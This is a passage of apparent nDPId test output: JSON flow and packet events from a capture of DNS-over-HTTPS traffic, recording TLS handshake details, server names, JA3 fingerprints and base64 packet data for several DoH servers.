WmQegZl\/LhTQw4INPlPDF
Em0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9Zf
HWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8k
i7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r
6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW
5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="} 